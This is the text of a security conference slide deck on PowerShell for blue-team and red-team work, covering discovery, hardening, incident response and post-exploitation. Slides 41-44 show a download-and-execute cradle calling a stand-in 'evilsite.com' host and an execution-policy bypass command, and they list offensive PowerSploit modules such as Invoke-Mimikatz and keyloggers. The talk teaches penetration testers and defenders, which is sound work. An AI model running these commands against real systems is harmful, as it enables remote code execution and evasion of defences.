This document discusses the advantages and applications of PowerShell for security professionals, emphasizing its integration into Windows and its superiority over traditional scripting tools. It outlines PowerShell's functionalities such as cmdlets, remoting, and automation for discovery, baseline management, and incident response. The document also touches on tools and frameworks like PoshSec for security automation and highlights best practices for writing and managing PowerShell code.

1. Who should use Powershell?
You should use Powershell!
Ben Finke
@benfinke

2. A bit about me…
Ben Finke
@benfinke (if you’re in to that sort of thing)

3. ▪ Security team at EI

4. ▪ Love continuous learning

5. Red Teamer Blue Teamer

6. What brought me to Powershell

7. Standing on the Shoulders…
▪ Carlos Perez
▪ Matt Graeber
▪ Chris Campbell
▪ Matt Johnson
▪ Don Jones
▪ Lee Holmes
▪ Wolfgang Goerlich
▪ Rich Cassara
▪ Nick Jacob
▪ BenTen
▪ EdWilson
▪ Adam Driscoll
▪ And many, many more…..

8. I’m NOT saying…
Only use Powershell!!

9. I’m NOT saying…
My way or the highway

10. I AM saying…
UseWindows?
Powershell is great.

11. I AM saying…
New to scripting?
Powershell is great

12. I AM saying…
Pick the right tool for the right job.

13. Powershell – The Beginning
▪ Built into Windows!
▪ Better than Batch and cmd.exe
▪ Objects > Manipulating text output
▪ Powershell Remoting
▪ Did I mention its built intoWindows?!
▪ Great documentation, code samples, communities
▪ Best tool for scripting and automatingWindows

14. Levelset
▪ Cmdlet (pronounced like it sounds)
▪ Functions
▪ Scripts
▪ Modules
▪ Object
▪ Method vs Property
▪ Variable

15. Cmdlet
▪ Not misspelled – a feature!
▪ Powershell commands – implement specific functionality
▪ Verb-Noun pattern
▪ Microsoft andThird-Party cmdlets available
▪ Written in .Net (like C#)
▪ Get-Command
▪ Get-Help

17. So, where do I write my awesome code?
▪ Powershell ISE
▪ Notepad++
▪ SublimeText Editor 2
▪ Primal Script ($)
▪ Visual Studio ($ or Community)
▪ You’re totally going to need aWindows computer though… 

18. Powershell ISE
▪ Integrated Scripting Environment
▪ Tab Expansion
▪ Module Search
▪ Context based Help
▪ Demo!

19. Blue Team – Builder and Defender
Discovery
Baseline
System
Hardening
Incident Response

20. Show Command Logging

21. Powershell Remoting
▪ Run that powershell script on a remoteWindows system!
▪ Uses WinRM

22. Powershell Remoting – A word of caution
▪ Windows 2012 and newer – default w/ HTTP listener
▪ All others needs to be configured (onceWMF is installed)
▪ Kerberos in AD, Basic and NTLM for workgroups
▪ Use HTTPS when available! (need aWindows CA)
▪ CredSSP is an option (especially if you like PtH Attacks)
– That was a joke, you don’t.
▪ CredSSP for delegation and multi-hops

23. Discovery
Discovery
Baseline
System
Hardening
Incident Response

24. Powershell Discovery
▪ Incorporate useful information from other tools
– Nmap
– Nessus
▪ Pull info fromAD directly
– Windows 2008 R2 – 76 cmdlets in AD PS Module
– Windows 2012 – 135 cmdlets
– Windows 2012 R2 – 147 cmdlets
▪ Roll your own scanner with Powershell!

25. Baseline your stuff…
Discovery
Baseline
System
Hardening
Incident Response

26. Baseline – Discovery, done repeatedly
▪ A lot of your discovery tasks will end up in your baseline
▪ Script up what you want to know
▪ Put it into some kind of usable text format
▪ Stash it in a versioning repository
▪ What changed between yesterday and today?

27. Automate Reporting
▪ Need to nicely present Nessus or nmap output?
▪ Previous work
– Carlos Perez (DarkOperator) – Posh-NVS
▪ https://github.com/darkoperator/Posh-NVS
▪ Powershell easily handles XML and CSV inputs
[xml]$report = Get-Content –Raw .scan.nessus
$reporthosts = $report.NessusClientData_v2.Report.ReportHost
$reporthosts | foreach {$_.ReportItem} | Out-GridView

28. Script out your ideal config…
Discovery
Baseline
System
Hardening
Incident Response

29. System Hardening
▪ Use Powershell to
– Enable windows firewall
– Enable windows update
– Disable Guest account
– Disable autoplay
– Install AV software
– Turn on User Account Control
– Disable Java in IE

30. What to do when weird things happen…
Discovery
Baseline
System
Hardening
Incident Response

31. Incident Response
▪ Something bad (or maybe bad) is happening
▪ Identify source of unwanted activity
▪ Determine what is occurring
▪ Isolate and Contain
▪ Gather information from isolated system(s)
▪ After Action review

33. Build Your Own HoneyPot!
▪ Create cmdlet parameter binding
▪ Make sure you’re admin
▪ Build your whitelist
▪ Create a listening port
▪ Any connection – add source IP to firewall
▪ Log the action (for reporting and response)

34. PoshSec
▪ A Powershell module designed for executing security tasks on
Windows systems
▪ Started byWill Steele and Matt Johnson
▪ Github – PoshSec
▪ BlueTeam Focused
▪ Provides the platform for scripting and automating your playbook

35. PoshSec Framework
▪ A framework for Powershell and PoshSec scripts for network
management, security, and maintenance
▪ Graphical Framework

36. PoshSec
▪ Critical Security Controls
– (1) Inventory of Authorized and Unauthorized Devices
– (2) Inventory of Authorized and Unauthorized Software
– (11) Limitation and Control of Network Ports, Protocols, and Services
– (12) Controlled Use ofAdmin Privileges
– (16)Account Monitoring and Control
▪ Baselines
▪ Forensics
▪ Log Management
▪ Software Management

37. A few helpful hints
▪ Get a code repo – SVN/Git/TFS/whatever
▪ Centralized logging
▪ Prepare BEFORE the Incident
▪ Test your defenses
▪ Test your response

38. Red Team – Destroyer of Dreams

39. Attacker’s Advantage
“Attack him where he is unprepared,
appear where you are not expected.”
-Sun Tzu
*Obligatory Art of War quote

40. So you’re on this pentest…
▪ You totally exploit that one thing.
▪ And then AV stops every. Single.Thing.You.Try.
▪ Time to Live off the Land!**
** Living off the Land – By Chris Campbell and Matt Graeber

41. Powershell as a Post Exploitation Tool
▪ Remember what we said about already on the system?
▪ Bypass AV and application whitelisting
▪ Control all aspects of aWindows system
▪ Easy to execute:
Invoke-Expression (New-Object
Net.WebClient).DownloadString("http://evilsite.com/code.txt")

42. PowerSploit
▪ Github project - https://github.com/mattifestation/PowerSploit
▪ Started my Matt Graeber (@mattifestation)
▪ Powershell modules for pentesters
▪ Loads of PS goodness like:
• Invoke-Shellcode
• Find-AVSignature
• Invoke-TokenManipulation
• Invoke-Mimikatz
• Get-Keystrokes
• Get-TimedScreenshot
• Set-MasterBootRecord
• Set-CriticalProcess (BSoD)
• Invoke-Portscan
• Invoke-ReverseDnsLookup
• Get-PEHeader
• Get-DLLLoadPath
• And lots, lots more!

43. “But wait!” you say…
Won’t the Execution Policy prevent our PS from running?

44. Not so much…
Powershell.exe –ExecutionPolicy Bypass evilscript.ps1

45. Seriously Bro, Powershell on a pentest?
▪ Yes, I am quite serious (and don’t call me Bro…)
▪ Ever hear of Deep Panda?
– ProTip: Do NOT search for “Deep Panda” on Google Images.
▪ Deep Panda – the APT, not the 80s Metal Band
▪ Maintained persistence with Powershell scripts as scheduled tasks
▪ Moral of the story : Good enough for Deep Panda, good enough for you!

46. Whatever you are writing, please
remember…
▪ Your code will be written once – and read dozens more.
▪ “accountName” is a way better variable than “a”
▪ Comments – use them!
▪ Think modular (or reusable)
▪ Error Catching
▪ Logging
▪ Documentation of your functions
▪ Code Repository

47. That’s it for me, you’ve been great!
If you enjoyed the talk, my name is Ben Finke.
If not, I’m Jess Hires (@hacksonville).
Thank you!